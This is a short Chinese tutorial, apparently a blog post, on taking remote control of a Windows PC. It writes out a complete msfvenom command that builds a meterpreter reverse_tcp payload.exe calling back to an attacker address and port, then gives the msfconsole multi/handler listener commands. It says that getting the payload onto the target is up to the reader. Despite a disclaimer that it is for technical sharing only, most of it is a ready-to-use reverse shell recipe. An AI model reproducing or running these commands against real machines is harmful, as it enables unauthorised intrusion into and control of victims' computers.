提前声明:本文内容只用于技术分享,如被用作其他用途,所产生的后果与本作者无关
本篇分享如何对个人电脑达到远程操作的目的。
第一步:你需要用Kali做一个被控端
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.199 lport=5000 -f exe -o /root/payload.exe
-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”,这不是个文件路径直接用就行
lhost:主控端的地址
lport:主控端端口
-f:文件的类型为exe类型
-o:生成被控端名为payload.exe,保存在kali的/root目录下
被控端生成后,怎么放到目标电脑上是你的事,本篇准备了一个Win10虚拟机
第二步:在Kali这里打开主控端会话,执行无参数msfconsole命令
msfconsole
等待日志输出完成,会打开如下会话
在会话中输入如下命令,启动主控端的监听程序
use exploit/multi/handler
设置被控端程序
set payload windows/meterpreter/reverse_tcp
主控端声明一个IP,要和你生成被控程序时用的一样
set lhost 192.168.31.199
set lport 5000
执行命令,开始监听被控程序
exploit
第三步:目标电脑触发被控程序,就是等目标运行了被控程序后,你在主控端会收到一条日志,并出现控制会话
此时你就可以做你想做的事情了,注意操作时最好是先运行一下help命令,看一下这个工具可以支持哪些命令,且一般触发后,主控端所处在被控程序被触发的目录中